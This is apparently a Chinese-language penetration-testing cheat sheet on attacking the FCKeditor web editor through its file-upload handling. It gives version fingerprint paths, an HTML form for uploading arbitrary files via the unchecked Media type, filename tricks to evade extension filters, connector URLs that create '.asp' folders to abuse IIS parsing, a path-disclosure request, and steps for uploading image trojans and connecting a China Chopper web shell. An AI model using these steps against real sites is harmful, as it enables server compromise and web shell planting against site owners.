fck编辑器
查看版本:
FCKeditor/_whatsnew.html
/fckeditor/editor/dialong/fck_about.html
2.2版本:apache+linux 环境下上传文件后面加个 .
<=2.4.2 for php
在处理php上传的地方并未对Media类型进行上传文件类型的控制,导致用户上传任意文件,将以下保存为html文件,修改action地址:
<form id="frmUpload" enctype="multipart/form-data" action="" Type="Media" Method="post">
Upload a new file:<br>
<input type="file" name="uploadfile" size="100"><br>
<input id="btnUpload" type="submit" value="Upload">
</form>
也可以在网上找到该版本下的一些上传地址,逐个尝试来上传x.asp文件夹,文件夹下创建图片木马,上传成功,查看网页源代码找到图片url,访问,菜刀连接。
fckeditor文件上传“.”变为“_”下划线的绕过方法:
在很多时候上传的文件例如:shell.php.rar或者shell.php;.jpg会变为shell_php;.jpg,可以提交shell.php+空格绕过,空格只支持win系统。
二次上传:继续上传同名文件会变为shell.php;(1).jpg。
也可以创建目录,该目录下进行上传文件可绕过。
突破建立文件夹FCKeditor_2.5/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/xx.asp&NewFolderName=x.asp
此时 递归创建了第二层目录,在该目录上传木马文件就可以绕过。
复制完整地址,查看网页源码,找到突破的url,访问突破,菜刀连接。
也可以在上传的时候进行抓包,将我们上传的c.asp文件夹,修改成cc.asp,这样就绕过c.asp,在cc.asp上传木马就可以了。
在代理下的raw修改%2F为cc.asp。
爆路径漏洞:
FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=/shell.asp
FCKeditor被动限制策略所导致的过滤不严问题:
影响版本: <= 2.4.3
2.4.3中File类别默认拒绝上传类型:
html\htm\php\php2\php3\php4\php5\phtml\inc\asp\aspx\ascx\jsp\cfm\cfc\pl\bat\exe\com\all\vbs\js\reg\cgi\htaccess\asis\sh\shtml\shtml\phtm
Fckeditor 2.0 <= 2.2允许上传asa\cer\php2\php4\inc\pwml\pht后缀文件,上传后保存的文件直接用的$sFilePath = $sServerDir . $sFileName,而没有使用$sExtension为后缀.直接导致在win下上传文件后面加个.来突破。
在apache下,Apache文件名解析缺陷漏洞也可以利用,建议上传漏洞中定义TYPE变量时使用File类型。